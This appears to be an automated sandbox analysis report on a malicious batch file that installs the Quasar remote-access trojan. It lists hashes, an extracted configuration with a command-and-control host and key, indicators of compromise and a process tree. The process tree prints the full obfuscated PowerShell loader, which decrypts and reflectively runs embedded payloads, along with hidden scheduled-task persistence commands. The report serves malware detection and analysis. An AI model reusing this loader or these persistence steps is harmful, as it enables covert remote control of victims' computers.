Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
12-05-2024 15:22
Static task
static1
Behavioral task
behavioral1
Sample
Client-built.bat
Resource
win7-20240220-en
General
-
Target
Client-built.bat
-
Size
1.9MB
-
MD5
ca98faeecf7f69f417e6b8e706986b2e
-
SHA1
2ed0d04b476658f57e50b86dba53cdc0edb379e8
-
SHA256
69d3f18cd40fe951e863d6f7cb34f623ae1f169a030c166efd713630744b14da
-
SHA512
ad3a6e51492f68bf623b08d01d8d9cc9bc58a6496e04c734ddacd2be120987f56ff228bf24f92a67aff408d801a670cfbb83564907219523776b7a8263b41d64
-
SSDEEP
24576:DqPPl9YNqSrDNfqgg4edWKa1tpD0jH3F8DbFkBNKUXuiFgZULkB4VmVc0i6MwGxb:W1cqzx/WOrBSkQJ8b
Malware Config
Extracted
quasar
1.0.0
New
even-lemon.gl.at.ply.gg:33587
2bce5514-d527-4787-825c-3042f9dd5ede
-
encryption_key
501DB7A849356BF2C272A70D53FAF39F17D4245C
-
install_name
WinHost32.exe
-
log_directory
UpdateLogs
-
reconnect_delay
3000
-
startup_key
Powershell
-
subdirectory
System32
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1116-143-0x00000276603E0000-0x00000276606FE000-memory.dmp family_quasar -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 4980 powershell.exe 1116 powershell.exe 4708 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
Processes:
WinHost32.exepid process 2036 WinHost32.exe -
Drops file in System32 directory 5 IoCs
Processes:
svchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Tasks\Powershell svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 1 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Modifies registry class 15 IoCs
Processes:
svchost.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133600010094500853" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133596474547727688" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133600010112156993" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\PCT = "133596474545384007" svchost.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exepowershell.exepowershell.exeWinHost32.exepid process 4708 powershell.exe 4708 powershell.exe 4980 powershell.exe 4980 powershell.exe 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe 2036 WinHost32.exe 2036 WinHost32.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4708 powershell.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeIncreaseQuotaPrivilege 4980 powershell.exe Token: SeSecurityPrivilege 4980 powershell.exe Token: SeTakeOwnershipPrivilege 4980 powershell.exe Token: SeLoadDriverPrivilege 4980 powershell.exe Token: SeSystemProfilePrivilege 4980 powershell.exe Token: SeSystemtimePrivilege 4980 powershell.exe Token: SeProfSingleProcessPrivilege 4980 powershell.exe Token: SeIncBasePriorityPrivilege 4980 powershell.exe Token: SeCreatePagefilePrivilege 4980 powershell.exe Token: SeBackupPrivilege 4980 powershell.exe Token: SeRestorePrivilege 4980 powershell.exe Token: SeShutdownPrivilege 4980 powershell.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeSystemEnvironmentPrivilege 4980 powershell.exe Token: SeRemoteShutdownPrivilege 4980 powershell.exe Token: SeUndockPrivilege 4980 powershell.exe Token: SeManageVolumePrivilege 4980 powershell.exe Token: 33 4980 powershell.exe Token: 34 4980 powershell.exe Token: 35 4980 powershell.exe Token: 36 4980 powershell.exe Token: SeIncreaseQuotaPrivilege 4980 powershell.exe Token: SeSecurityPrivilege 4980 powershell.exe Token: SeTakeOwnershipPrivilege 4980 powershell.exe Token: SeLoadDriverPrivilege 4980 powershell.exe Token: SeSystemProfilePrivilege 4980 powershell.exe Token: SeSystemtimePrivilege 4980 powershell.exe Token: SeProfSingleProcessPrivilege 4980 powershell.exe Token: SeIncBasePriorityPrivilege 4980 powershell.exe Token: SeCreatePagefilePrivilege 4980 powershell.exe Token: SeBackupPrivilege 4980 powershell.exe Token: SeRestorePrivilege 4980 powershell.exe Token: SeShutdownPrivilege 4980 powershell.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeSystemEnvironmentPrivilege 4980 powershell.exe Token: SeRemoteShutdownPrivilege 4980 powershell.exe Token: SeUndockPrivilege 4980 powershell.exe Token: SeManageVolumePrivilege 4980 powershell.exe Token: 33 4980 powershell.exe Token: 34 4980 powershell.exe Token: 35 4980 powershell.exe Token: 36 4980 powershell.exe Token: SeIncreaseQuotaPrivilege 4980 powershell.exe Token: SeSecurityPrivilege 4980 powershell.exe Token: SeTakeOwnershipPrivilege 4980 powershell.exe Token: SeLoadDriverPrivilege 4980 powershell.exe Token: SeSystemProfilePrivilege 4980 powershell.exe Token: SeSystemtimePrivilege 4980 powershell.exe Token: SeProfSingleProcessPrivilege 4980 powershell.exe Token: SeIncBasePriorityPrivilege 4980 powershell.exe Token: SeCreatePagefilePrivilege 4980 powershell.exe Token: SeBackupPrivilege 4980 powershell.exe Token: SeRestorePrivilege 4980 powershell.exe Token: SeShutdownPrivilege 4980 powershell.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeSystemEnvironmentPrivilege 4980 powershell.exe Token: SeRemoteShutdownPrivilege 4980 powershell.exe Token: SeUndockPrivilege 4980 powershell.exe Token: SeManageVolumePrivilege 4980 powershell.exe Token: 33 4980 powershell.exe Token: 34 4980 powershell.exe Token: 35 4980 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 1196 wrote to memory of 3052 1196 cmd.exe cmd.exe PID 1196 wrote to memory of 3052 1196 cmd.exe cmd.exe PID 1196 wrote to memory of 4708 1196 cmd.exe powershell.exe PID 1196 wrote to memory of 4708 1196 cmd.exe powershell.exe PID 4708 wrote to memory of 4980 4708 powershell.exe powershell.exe PID 4708 wrote to memory of 4980 4708 powershell.exe powershell.exe PID 4708 wrote to memory of 3812 4708 powershell.exe WScript.exe PID 4708 wrote to memory of 3812 4708 powershell.exe WScript.exe PID 3812 wrote to memory of 1592 3812 WScript.exe cmd.exe PID 3812 wrote to memory of 1592 3812 WScript.exe cmd.exe PID 1592 wrote to memory of 432 1592 cmd.exe cmd.exe PID 1592 wrote to memory of 432 1592 cmd.exe cmd.exe PID 1592 wrote to memory of 1116 1592 cmd.exe powershell.exe PID 1592 wrote to memory of 1116 1592 cmd.exe powershell.exe PID 1116 wrote to memory of 3480 1116 powershell.exe Explorer.EXE PID 1116 wrote to memory of 1232 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 5112 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 2148 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 952 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1936 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 2328 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1144 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 4492 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 2716 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1924 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1332 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 732 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 3092 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1512 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1708 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1312 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 2684 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1304 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1500 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1696 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 2088 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1492 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 900 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 3064 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1484 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 684 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1076 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 2572 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1656 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 2640 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 864 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1052 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 3696 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 3412 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1044 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 3596 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 2012 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1812 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 792 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 2392 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1996 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1204 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 2188 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 2384 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 1784 1116 powershell.exe svchost.exe PID 1116 wrote to memory of 320 1116 powershell.exe schtasks.exe PID 1116 wrote to memory of 320 1116 powershell.exe schtasks.exe PID 1116 wrote to memory of 2036 1116 powershell.exe WinHost32.exe PID 1116 wrote to memory of 2036 1116 powershell.exe WinHost32.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Modifies registry class
PID:792 -
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:4396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:864
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1204
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1332
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1500
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1656
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1696
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1784
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1924
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1936
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2012
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2088
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2148
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2188
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2640
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3412
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3480
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LfcFzG8RsgFQuzCbge5AZWKnjDyvcb7J2DMyfnjW+WE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t0LkWuaxKmd71m5FdnY80w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vGXxC=New-Object System.IO.MemoryStream(,$param_var); $MJyez=New-Object System.IO.MemoryStream; $GEiaV=New-Object System.IO.Compression.GZipStream($vGXxC, [IO.Compression.CompressionMode]::Decompress); $GEiaV.CopyTo($MJyez); $GEiaV.Dispose(); $vGXxC.Dispose(); $MJyez.Dispose(); $MJyez.ToArray();}function execute_function($param_var,$param2_var){ $wRrOX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JYzvg=$wRrOX.EntryPoint; $JYzvg.Invoke($null, $param2_var);}$BMtWH = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$host.UI.RawUI.WindowTitle = $BMtWH;$VjJUr=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BMtWH).Split([Environment]::NewLine);foreach ($buUQD in $VjJUr) { if ($buUQD.StartsWith('ZyCIkpbtJnSamEKtqvbb')) { $OKyUT=$buUQD.Substring(20); break; }}$payloads_var=[string[]]$OKyUT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:3052
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_287_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_287.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4980 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_287.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3812 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_287.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LfcFzG8RsgFQuzCbge5AZWKnjDyvcb7J2DMyfnjW+WE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t0LkWuaxKmd71m5FdnY80w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vGXxC=New-Object System.IO.MemoryStream(,$param_var); $MJyez=New-Object System.IO.MemoryStream; $GEiaV=New-Object System.IO.Compression.GZipStream($vGXxC, [IO.Compression.CompressionMode]::Decompress); $GEiaV.CopyTo($MJyez); $GEiaV.Dispose(); $vGXxC.Dispose(); $MJyez.Dispose(); $MJyez.ToArray();}function execute_function($param_var,$param2_var){ $wRrOX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JYzvg=$wRrOX.EntryPoint; $JYzvg.Invoke($null, $param2_var);}$BMtWH = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_287.bat';$host.UI.RawUI.WindowTitle = $BMtWH;$VjJUr=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BMtWH).Split([Environment]::NewLine);foreach ($buUQD in $VjJUr) { if ($buUQD.StartsWith('ZyCIkpbtJnSamEKtqvbb')) { $OKyUT=$buUQD.Substring(20); break; }}$payloads_var=[string[]]$OKyUT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:432
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\WinHost32.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
PID:320 -
C:\Users\Admin\AppData\Roaming\System32\WinHost32.exe"C:\Users\Admin\AppData\Roaming\System32\WinHost32.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3596
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:5112
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
2KB
MD5d06f82edec1d0a224ef3a83215ca4c32
SHA10ce1cc6ca9996f575ff93608d1bd7b689fb9aa94
SHA25621538f0b88c8c199a1b496ce2873c735a22da06dd9535d61ff91bf7bbd066139
SHA512461122d88caab59b20868470f72afed8dc401bb7e0ea50a925f640bce403ecfd277e56a8a64c503de04cfba718cd394b478f945b7770d10073276576b7529752
-
Filesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.9MB
